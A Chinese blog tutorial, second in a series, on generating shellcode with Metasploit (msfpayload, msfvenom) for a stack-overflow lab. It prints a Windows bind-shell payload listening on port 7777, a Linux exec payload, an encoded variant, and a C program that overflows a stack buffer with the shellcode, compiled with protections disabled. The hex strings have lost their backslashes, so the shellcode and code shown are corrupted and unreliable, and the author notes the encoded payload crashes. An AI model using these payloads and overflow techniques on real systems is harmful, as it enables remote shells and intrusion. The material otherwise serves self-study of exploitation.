使用metasploit进行栈溢出攻击-2

基本的栈溢出搞明白了，真实攻击中一个很重要的问题是shellcode生成。

利用Metasploit提供的工具，可以方便的生成shellcode，然后可以使用第一篇中的代码进行验证。

先说一下如何生成shellcode（都是在bt5下生成）。

例子参考来源于：http://www.offensive-security.com/metasploit-unleashed/Msfpayload

查看可用payload：

root@kali:~# msfpayload -l

Framework Payloads (251 total)
==============================

    Name                                             Description
    ----                                             -----------
    aix/ppc/shell_bind_tcp                           Listen for a connection and spawn a command shell
    aix/ppc/shell_find_port                          Spawn a shell on an established connection
    aix/ppc/shell_interact                           Simply execve /bin/sh (for inetd programs)
    aix/ppc/shell_reverse_tcp                        Connect back to attacker and spawn a command shell
    bsd/sparc/shell_bind_tcp                         Listen for a connection and spawn a command shell

...snip...
...snip...

    windows/x64/shell/bind_tcp                       Listen for a connection (Windows x64), Spawn a piped command shell (Windows x64) (staged)
    windows/x64/shell/reverse_tcp                    Connect back to the attacker (Windows x64), Spawn a piped command shell (Windows x64) (staged)
    windows/x64/shell_bind_tcp                       Listen for a connection and spawn a command shell (Windows x64)
    windows/x64/shell_reverse_tcp                    Connect back to attacker and spawn a command shell (Windows x64)
    windows/x64/vncinject/bind_tcp                   Listen for a connection (Windows x64), Inject a VNC Dll via a reflective loader (Windows x64) (staged)
    windows/x64/vncinject/reverse_tcp                Connect back to the attacker (Windows x64), Inject a VNC Dll via a reflective loader (Windows x64) (staged)

查看具体payload参数配置：

root@kali:~# msfpayload windows/shell_bind_tcp o

       Name: Windows Command Shell, Bind TCP Inline
     Module: payload/windows/shell_bind_tcp
    Version: 14774
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 341
       Rank: Normal

Provided by:
  vlad902 
  sf 

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process, none
LPORT     4444             yes       The listen port
RHOST                      no        The target address

Description:
  Listen for a connection and spawn a command shell

最后生成shellcode，以上面例子为例，生成c语言可用shellcode：

root@bt:~# msfpayload windows/shell_bind_tcp LPORT=7777 C
/*
 * windows/shell_bind_tcp - 341 bytes
 * http://www.metasploit.com
 * VERBOSE=false, LPORT=7777, RHOST=, EXITFUNC=process,
 * InitialAutoRunScript=, AutoRunScript=
 */
unsigned char buf[] =
"xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30"
"x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xff"
"x31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2"
"xf0x52x57x8bx52x10x8bx42x3cx01xd0x8bx40x78x85"
"xc0x74x4ax01xd0x50x8bx48x18x8bx58x20x01xd3xe3"
"x3cx49x8bx34x8bx01xd6x31xffx31xc0xacxc1xcfx0d"
"x01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58"
"x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8b"
"x04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xff"
"xe0x58x5fx5ax8bx12xebx86x5dx68x33x32x00x00x68"
"x77x73x32x5fx54x68x4cx77x26x07xffxd5xb8x90x01"
"x00x00x29xc4x54x50x68x29x80x6bx00xffxd5x50x50"
"x50x50x40x50x40x50x68xeax0fxdfxe0xffxd5x89xc7"
"x31xdbx53x68x02x00x1ex61x89xe6x6ax10x56x57x68"
"xc2xdbx37x67xffxd5x53x57x68xb7xe9x38xffxffxd5"
"x53x53x57x68x74xecx3bxe1xffxd5x57x89xc7x68x75"
"x6ex4dx61xffxd5x68x63x6dx64x00x89xe3x57x57x57"
"x31xf6x6ax12x59x56xe2xfdx66xc7x44x24x3cx01x01"
"x8dx44x24x10xc6x00x44x54x50x56x56x56x46x56x4e"
"x56x56x53x56x68x79xccx3fx86xffxd5x89xe0x4ex56"
"x46xffx30x68x08x87x1dx60xffxd5xbbxf0xb5xa2x56"
"x68xa6x95xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0x75"
"x05xbbx47x13x72x6fx6ax00x53xffxd5";

当然我们实在linux环境下，需要生成的linux相关shellcode，那么我们以exec payload来生成shellcode：

root@bt:~# msfpayload  linux/x86/exec CMD=ls C
/*
 * linux/x86/exec - 38 bytes
 * http://www.metasploit.com
 * VERBOSE=false, PrependSetresuid=false,
 * PrependSetreuid=false, PrependSetuid=false,
 * PrependChrootBreak=false, AppendExit=false, CMD=ls
 */
unsigned char buf[] =
"x6ax0bx58x99x52x66x68x2dx63x89xe7x68x2fx73x68"
"x00x68x2fx62x69x6ex89xe3x52xe8x03x00x00x00x6c"
"x73x00x57x53x89xe1xcdx80";

好，现在我们就可以在上一节的shell.c中进行验证

#include<unistd.h>

unsigned char large_string[128]; 
/*
 * linux/x86/exec - 38 bytes
 * http://www.metasploit.com
 * VERBOSE=false, PrependSetresuid=false,
 * PrependSetreuid=false, PrependSetuid=false,
 * PrependChrootBreak=false, AppendExit=false, CMD=ls
 */
unsigned char shellcode[] =
"x6ax0bx58x99x52x66x68x2dx63x89xe7x68x2fx73x68"
"x00x68x2fx62x69x6ex89xe3x52xe8x03x00x00x00x6c"
"x73x00x57x53x89xe1xcdx80";

void main() { 
    char buffer[96]; 
    int i; 
    long *long_ptr = (long *) large_string; 
    for (i = 0; i < sizeof(large_string)/sizeof(int); i++) 
        *(long_ptr + i) = (int) buffer; 

    for (i = 0; i < sizeof(shellcode); i++) 
        large_string[i] = shellcode[i]; 
    memcpy(buffer,large_string,sizeof(large_string));
} 

请注意25行，我使用了memcpy替换了strcpy，因为生成的shellcode中有不少00.

同样使用命令编译生成验证：

bai@ubuntu:/mnt/hgfs/r/stack$ gcc -fno-stack-protector -z execstack -g -o shell shell.c
bai@ubuntu:/mnt/hgfs/r/stack$ ./shell

关于如何避免shellcode中包含00,可以使用msfvenom，还以上面的例子为例：

root@bt:~# msfvenom  -p linux/x86/exec CMD=ls -e x86/shikata_ga_nai -b 'x00' -f c
[*] x86/shikata_ga_nai succeeded with size 65 (iteration=1)
unsigned char buf[] =
"xdbxd6xd9x74x24xf4xbbxe3xa4x6bx7ex58x2bxc9xb1"
"x0ax83xc0x04x31x58x15x03x58x15x01x51x01x75x9d"
"x03x84xefx75x19x4ax79x62x09xa3x0ax04xcaxd3xc3"
"xb6xa3x4dx95xd5x66x7axa6x19x87x7axc5x6ax87x2d"
"x46x05x66x1cxe8";

但是有个问题，生成的shellcode无法利用，会把illegal instruction，引起core dump，不明原因。